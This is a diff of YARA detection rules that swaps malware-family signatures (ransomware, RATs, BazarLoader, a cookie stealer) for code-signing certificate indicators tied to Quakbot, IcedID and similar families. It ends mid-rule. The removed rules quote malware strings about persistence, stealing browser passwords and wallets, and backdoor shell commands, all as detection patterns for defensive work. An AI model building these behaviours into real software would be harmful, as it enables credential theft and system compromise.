+		thumbprint = "89ff94ac1c577eced3afc9a81689d30ca238a8472ad0f025f6bed57a98dbb273"
+		reason = "Quakbot"
+		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x0805 ) and 6 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Power Save Systems s.r.o." and pe.signatures [ i ] . serial == "47:28:18:9f:a0:f5:77:93:48:4c:df:76:4f:5e:28:3d" )
 }
-rule DITEKSHEN_MALWARE_Win_Cobianrat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_24E4A2B3Db6Be1007B9Ddc91995Bc0C8 : FILE
 {
 	meta:
-		description = "Detects CobianRAT, a fork of Njrat"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "5a9b6f04-fc52-52a9-b72f-d24dd093e886"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5626-L5640"
+		id = "47ca5986-3de8-56f2-a15d-ef588d8a9e03"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8341-L8354"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5c8f55e5328b61c3591c876797b4521f8e98af7a6c53bab918f10d5c3c2b5013"
+		logic_hash = "71d1f8e9113170f410007b31c0d7316c537001b2a761f1e35d6bd2aa0b39f2d9"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "1.0.40.7" fullword wide
-		$s2 = "DownloadData" fullword wide
-		$s3 = "Executed As" fullword wide
-		$s4 = "\\Plugins" fullword wide
-		$s5 = "LOGIN" fullword wide
-		$s6 = "software\\microsoft\\windows\\currentversion\\run" wide
-		$s7 = "Hidden" fullword wide
+		thumbprint = "005af6c8e9f06a2258c2df70785a5622c8d10d982fdc7f4dbe2f53af6e860359"
+		reason = "Quakbot"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FLY BETTER s.r.o." and pe.signatures [ i ] . serial == "24:e4:a2:b3:db:6b:e1:00:7b:9d:dc:91:99:5b:c0:c8" )
 }
-rule DITEKSHEN_MALWARE_Win_Leivion : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0772B4D1D63233D2B8771997Bc8Da5C4 : FILE
 {
 	meta:
-		description = "Detects Leivion"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "77800add-8fff-5657-9ed6-a23517bce0b1"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5660-L5673"
+		id = "a05a2bc4-a4a3-5e86-9a1c-ed82de7786df"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8356-L8369"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a0cda23df4301b66feedad7c04b4d051c07474ccaa07c05598dd0b47bb6fc7e6"
+		logic_hash = "056fefbc03cff00a40ea9bb65893b92fcc15134c7cf7bf7dedf98f43b44bc03d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "/var/lib/veil/go/src/runtime/mem_windows.go" fullword ascii
-		$s2 = "/var/lib/veil/go/src/internal/singleflight/singleflight.go" fullword ascii
-		$s3 = "/var/lib/veil/go/src/net/http/sniff.go" fullword ascii
-		$s4 = "/var/lib/veil/go/src/net/sendfile_windows.go" fullword ascii
-		$s5 = "/var/lib/veil/go/src/os/exec_" ascii
-		$s6 = "/var/lib/veil/go/src/runtime/mgcsweep.go" fullword ascii
+		thumbprint = "c6a78692f2fda8908933fb3f1df68592eb5da129caafd33329d1b804006973f7"
+		reason = "IcedID"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Maya logistika d.o.o." and pe.signatures [ i ] . serial == "07:72:b4:d1:d6:32:33:d2:b8:77:19:97:bc:8d:a5:c4" )
 }
-rule DITEKSHEN_MALWARE_Win_Banload : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_1Deea179F5757Fe529043577762419Df : FILE
 {
 	meta:
-		description = "Detects Banload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "4672bce1-1280-576d-b7df-f0181a854058"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5675-L5688"
+		id = "a6b9b9e4-0998-5f67-8c12-7628ba3a5a56"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8371-L8384"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5cbc69d11b73f60d6eee3f23ed6cc217ba37a3408cb69e396e0394b5a1e20b75"
+		logic_hash = "b521363d1d38a4ed1b2b4126aec85ed6bffc23dc4e30f6f6c942e1fa96b0dd8d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "main.die" fullword ascii
-		$s2 = "main.postResults" fullword ascii
-		$s3 = "main.checkin" fullword ascii
-		$s4 = "RegQueryValueExWRemoveDirectoryWSETTINGS_TIMEOUTTerminateProcessUpgrade RequiredUser-Agent: %s" ascii
-		$s5 = "pcuser-agentws2_32.dll (targetpc= DigestType ErrCode=%v" ascii
-		$s6 = "invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrie" fullword ascii
+		thumbprint = "9c4e87ccd6004a70115f8e654b8cc1a80d488876ff2e4e7db598303fa41b3fef"
+		reason = "Quakbot"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SPIRIT CONSULTING s. r. o." and pe.signatures [ i ] . serial == "1d:ee:a1:79:f5:75:7f:e5:29:04:35:77:76:24:19:df" )
 }
-rule DITEKSHEN_MALWARE_Win_TYRAT : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_061A27A3A3771Bb440Fc16Cadf2675C4 : FILE
 {
 	meta:
-		description = "Detects TYRAT"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "316c50cc-964e-5d24-b169-7a09fdf61638"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5690-L5703"
+		id = "ef600135-6f5d-59a9-b387-60e8eb97cbf9"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8386-L8399"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b733b7aa3ba1195807fb728453c0f3f4df2177836054af6f7a863e14058884cb"
+		logic_hash = "d85b9d2b6fe4ce99670a8f51e84d63f1ec6d0341a3715eeed3e3d6a0fda93dc5"
 		score = 75
-		quality = 25
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "C:\\$MSIRecycle.Bin\\" fullword ascii
-		$s2 = "Range: bytes=%d-" fullword ascii
-		$s3 = "GET%sHTTP/1.1" fullword ascii
-		$s4 = "DllServer.dll" fullword ascii
-		$s5 = ".Bin\\bnch" ascii
-		$s6 = "User-Agent: wget" fullword ascii
+		thumbprint = "9ed703ba7033af5f88a5f5ef0155adc41715d3175eec836822a09a93d56e4b7f"
+		reason = "Matanbuchus"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Westeast Tech Consulting, Corp." and pe.signatures [ i ] . serial == "06:1a:27:a3:a3:77:1b:b4:40:fc:16:ca:df:26:75:c4" )
 }
-rule DITEKSHEN_MALWARE_Win_Infinitylock : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_06675181E7B5E1030B3D40926E2A47D3 : FILE
 {
 	meta:
-		description = "Detects InfinityLock ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "7a66cc19-c635-580b-abc2-b58bd48673bd"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5705-L5723"
+		id = "2452580b-bbe8-5d54-888e-6f8fffb055cf"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8401-L8414"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "634759f1c2d48becebc9c87e146e898524071738f74b7001b112dc793bcb581c"
+		logic_hash = "14d963fd03187afb7afabc208e36d8bb45ec818b27782a6c3037229f82bf22d6"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "_Encrypted$" fullword ascii
-		$s2 = "PublicKeyToken=" fullword ascii nocase
-		$s3 = "GenerateHWID" fullword ascii
-		$s4 = "CreateKey" fullword ascii
-		$d1 = "ProgrammFiles" fullword ascii
-		$d2 = "OneDrive" fullword ascii
-		$d3 = "ProgrammsX86" fullword ascii
-		$d4 = "UserDirs" fullword ascii
-		$d5 = "B_Drive" fullword ascii
-		$pdb1 = "F:\\DESKTOP!\\ChkDsk\\ChkDsk\\obj\\" ascii
-		$pdb2 = "\\ChkDsk\\obj\\Debug\\PremiereCrack.pdb" ascii
+		thumbprint = "b617253b3695fd498d645bd8278d1bdae2bc36bd4da713c6938e3fe6b0cdb9a4"
+		reason = "NetWire"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( all of ( $s* ) and 1 of ( $d* ) ) or ( 4 of ( $d* ) and 2 of ( $s* ) ) or ( any of ( $pdb* ) and 1 of ( $s* ) and 1 of ( $d* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ORANGE VIEW LIMITED" and pe.signatures [ i ] . serial == "06:67:51:81:e7:b5:e1:03:0b:3d:40:92:6e:2a:47:d3" )
 }
-rule DITEKSHEN_MALWARE_Win_Mountlocker : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_Dbc03Ca7E6Ae6Db6 : FILE
 {
 	meta:
-		description = "Detects MountLocker ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "0590d08d-1ee8-5dfe-af12-15b149acd2d6"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5725-L5740"
+		id = "801bc9fc-0bd6-5c46-8c45-8cb06cfc4309"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8416-L8429"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "30bc601fef60cc1c9d8bff5dd3f8a53214f088b74eb24fe2369f5664613e0eaf"
+		logic_hash = "7d188663b00870e98984b4be4c72b0fd183b5fb8dd61512c1d65d386f1ebad0a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "] locker.dir.check > " ascii wide
-		$s2 = "] locekr.kill." ascii wide
-		$s3 = "] locker.worm" ascii wide
-		$s4 = "%CLIENT_ID%" fullword ascii
-		$s5 = "RecoveryManual.html" ascii wide
-		$s6 = "RECOVERY MANUAL" ascii
-		$s7 = ".ReadManual.%0.8X" ascii wide
-		$s8 = "/?cid=%CLIENT_ID%" ascii
+		thumbprint = "e059776cb5e640569a06c2548e87af5bd655f5d4815b8f6e9482835455930987"
+		reason = "CobaltStrike"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 3 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SPIDER DEVELOPMENTS PTY LTD" and pe.signatures [ i ] . serial == "db:c0:3c:a7:e6:ae:6d:b6" )
 }
-rule DITEKSHEN_MALWARE_Win_Pingback : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_26F855A25890B749578F13E4B9459768 : FILE
 {
 	meta:
-		description = "Detects PingBack ICMP backdoor"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "ecb313b6-f923-5b6d-a4d7-a4650817ed84"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5742-L5761"
+		id = "2953afc3-6a46-5126-8f82-52f8dc1f89d6"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8431-L8444"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c5fa9ecefca1188ba5e81c0518f74023884ad0f66718fc030601cb458bdf2f12"
+		logic_hash = "2de5a2d4d692c14660a9ec3ed18a7d2d6741a862c86812fcd640b1378281c328"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Sniffer ok!" fullword ascii
-		$s2 = "recv icmp packet!" fullword ascii
-		$s3 = "WSASocket() failed: %d" fullword ascii
-		$s4 = "file on remote computers success" ascii
-		$s5 = "listen port error!" fullword ascii
-		$s6 = "\\PingBackService" ascii
-		$c1 = "exec" fullword ascii
-		$c2 = "rexec" fullword ascii
-		$c3 = "exep" fullword ascii
-		$c4 = "download" fullword ascii
-		$c5 = "upload" fullword ascii
-		$c6 = "shell" fullword ascii
+		thumbprint = "7c81ba35732d1998def02461217cfd723150151bc93375a3e27c2cec33915660"
+		reason = "Quakbot"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) or all of ( $c* ) or ( 4 of ( $c* ) and 2 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Boo’s Q & Sweets Corporation" and pe.signatures [ i ] . serial == "26:f8:55:a2:58:90:b7:49:57:8f:13:e4:b9:45:97:68" )
 }
-rule DITEKSHEN_MALWARE_Win_Bazarloader : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_25Ba18A267D6D8E08Ebc6E2457D58D1E : FILE
 {
 	meta:
-		description = "Detects BazarLoader variants"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "6282df59-7244-501f-bb60-09a2a519bd47"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5763-L5776"
+		id = "d2c4907e-cec2-5386-96d3-8c122c7557fa"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8446-L8459"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8febd1355bc03f71794ffb8d51cbb112e8acd2d26fec5bb736a388d5384e7747"
+		logic_hash = "38bdfa2291c7c3f81b29d41c65814002db3e4de11928699d2d946e87d313558d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Startdelay for %d ms to avoid some dynamic AV detects!" ascii
-		$s2 = "Use Debug for moving faster!" ascii
-		$s3 = "Logging Mutex %s to %s" ascii
-		$s4 = "FIRST AND ONLY COPY RUNNING! Mutex %s" ascii
-		$s5 = "the most secret 3d GetWinApiPointers line in the world!" ascii
-		$s6 = "[+] makeMD5hash. " ascii
+		thumbprint = "e59824f73703461c2c170681872a28a9bc4731d4b49079aa3afba1d29f83d736"
+		reason = "BadNews"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 3 of ( $s* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "5Y TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "25:ba:18:a2:67:d6:d8:e0:8e:bc:6e:24:57:d5:8d:1e" )
 }
-rule DITEKSHEN_MALWARE_Win_Coinminer01 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0A2787Fbb4627C91611573E323584113 : FILE
 {
 	meta:
-		description = "Detects coinmining malware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "739e7cea-c6b6-5add-86d4-382b00e2b645"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5778-L5790"
+		id = "5da7ac8f-34f7-5949-9987-32e983a77ebe"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8461-L8474"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "31a7531ecc7b8a35ba882c17d15bd3581e65b4b99dd3a7cb8bca8f6edf204114"
+		logic_hash = "e4ea9149f28798b48482ff68c3e08593a4510e3bd01e49ebdca7d450f15537e4"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "-o pool." ascii wide
-		$s2 = "--cpu-max-threads-hint" ascii wide
-		$s3 = "-P stratum" ascii wide
-		$s4 = "--farm-retries" ascii wide
-		$dl = "github.com/ethereum-mining/ethminer/releases/download" ascii wide
+		thumbprint = "8badf05b1814d40fb7055283a69a0bc328943100fe12b629f1c14b9448163aac"
+		reason = "Malware"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) or ( $dl ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "exxon.com" and pe.signatures [ i ] . serial == "0a:27:87:fb:b4:62:7c:91:61:15:73:e3:23:58:41:13" )
 }
-rule DITEKSHEN_PUA_Win_Ultrasurf : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_C81319D20C6F1F1Aec3398522189D90C : FILE
 {
 	meta:
-		description = "Detects UltraSurf / Ultrareach PUA"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "ba0f6867-bddc-5e72-978c-8e29b1b6b709"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5792-L5807"
+		id = "d93f571b-49f6-5a8b-9478-1054ede2257f"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8476-L8489"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d8d17b1bf20c12f864697d3dd66f345a8b93e2a75f0489b58b23b7f5264b6be3"
+		logic_hash = "1271d0cc05d35a70a90f605e7c68fc52605570e453e9e67fbeb74762a88a0a96"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Ultrareach Internet Corp." ascii
-		$s2 = "UltrasurfUnionRectUrlFixupWUse Proxy" ascii
-		$s3 = "Ultrasurf UnlockFileUrlEscapeWUser-Agent" ascii wide
-		$s4 = "Ultrasurf0#" ascii
-		$m1 = "main.bindata_read" fullword ascii
-		$m2 = "main.icon64_png" fullword ascii
-		$m3 = "main.setProxy" fullword ascii
-		$m4 = "main.openbrowser" fullword ascii
+		thumbprint = "18d8be8afa6613e2ef037598a6e08e0ef197d420f21aa4050f473fcabd16644a"
+		reason = "RedLineStealer"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $s* ) or ( all of ( $m* ) and 1 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMCERT,LLC" and pe.signatures [ i ] . serial == "c8:13:19:d2:0c:6f:1f:1a:ec:33:98:52:21:89:d9:0c" )
 }
-rule DITEKSHEN_MALWARE_Win_Hello : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_77550Ed697992B397E3F1Ad8E2A662D1 : FILE
 {
 	meta:
-		description = "Hunt for Hello / WickrMe ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "99c11aab-8a3a-5e10-9af0-542e55129d51"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5809-L5820"
+		id = "1d969340-de5e-569e-bfed-a80a1623d1b4"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8491-L8504"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f52f12eb38613f5afd5258b5263c6e6e2d9db6c9659a769f896a2bb66564fa69"
+		logic_hash = "87a70f10a111c4c5d1c3fb5b1c2a9da528f7d484ae6391c91e4052aba5c6bbe0"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "DeleteBackupFiles" ascii wide
-		$s2 = "GetEncryptFiles" ascii wide
-		$s3 = "DeleteVirtualDisks" ascii wide
-		$s4 = "DismountVirtualDisks" ascii wide
+		thumbprint = "0c439c7b60714158f62c45921caf30d17dae37ec6cbc2dfdd9d306e18ae6df63"
+		reason = "ParallaxRAT"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 3 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GRASS RAIN, s.r.o." and pe.signatures [ i ] . serial == "77:55:0e:d6:97:99:2b:39:7e:3f:1a:d8:e2:a6:62:d1" )
 }
-rule DITEKSHEN_MALWARE_Win_Buterat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_B1Bbef3Aba79Ab2Eae5B8015F26B34F8 : FILE
 {
 	meta:
-		description = "Detects ButeRAT"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "74f63d61-6589-5fb1-864a-3a02ddd57ebc"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5822-L5839"
+		id = "382952bd-ffb3-5ff7-aff1-cf9fe8f20d1d"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8506-L8519"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c3d93e8dc1bde8e77c11586c8d8b67d137ef2c4791e12269f1af310fbe14832b"
+		logic_hash = "34b00243f0b5e8d09938f1500871797125644f839298427c877801027638fd34"
 		score = 75
-		quality = 48
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "TVqQAAMAA" ascii
-		$s1 = "ipinfo.io/geo" wide
-		$s2 = "/index.php" wide
-		$s3 = "Copy-Item -Path" wide
-		$s4 = ";Start-Process" wide
-		$s5 = "Microsoft\\Windows\\Start Menu\\Programs\\Startup" wide
-		$s6 = "LOCALAPPDATA" fullword wide
-		$s7 = "passwords.json" wide
-		$s8 = "Scripting.FileSystemObject" fullword wide
-		$z1 = /(edge|chrome|opera|exodus|jaxx|atomic|coinomi)\.zip/ ascii wide nocase
+		thumbprint = "247a10fc20386f4f54b7451aecc2d97ec77567c5031028cc7f1b98f9191bee80"
+		reason = "NW0rm"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) or 1 of ( $z* ) ) and ( 4 of ( $s* ) ) or ( 6 of ( $s* ) ) or ( #z1 > 4 and 2 of them ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DIDZHITAL ART, OOO" and pe.signatures [ i ] . serial == "b1:bb:ef:3a:ba:79:ab:2e:ae:5b:80:15:f2:6b:34:f8" )
 }
-rule DITEKSHEN_MALWARE_Win_Cookiestealer : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_05D50A0E09Bb9A836Ffb90A3 : FILE
 {
 	meta:
-		description = "Detects generic cookie stealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "64c6c59d-4046-5949-bf71-22a5f6bfa209"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5841-L5857"
+		id = "f6947bf1-7f20-5be5-a242-c1025be40055"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8521-L8534"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9cc406ae078e37430b3cf10954c02014b9760bc887344842e724df735d1d9808"
+		logic_hash = "fc38ae0c9d4fc26739deab65ae3669f272e999b76dbc521dae04b9a3e3e7cef0"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "([\\S]+?)=([^;|^\\r|^\\n]+)" fullword ascii
-		$s2 = "(.+?): ([^;|^\\r|^\\n]+)" fullword ascii
-		$s3 = "Set-Cookie: ([^\\r|^\\n]+)" fullword ascii
-		$s4 = "cmd.exe /c taskkill /f /im chrome.exe" fullword ascii
-		$s5 = "FIREFOX.EXE|Google Chrome|IEXPLORE.EXE" ascii
-		$pdb1 = "F:\\facebook_svn\\trunk\\database\\Release\\DiskScan.pdb" fullword ascii
-		$pdb2 = "D:\\Projects\\crxinstall\\trunk\\Release\\spoofpref.pdb" fullword ascii
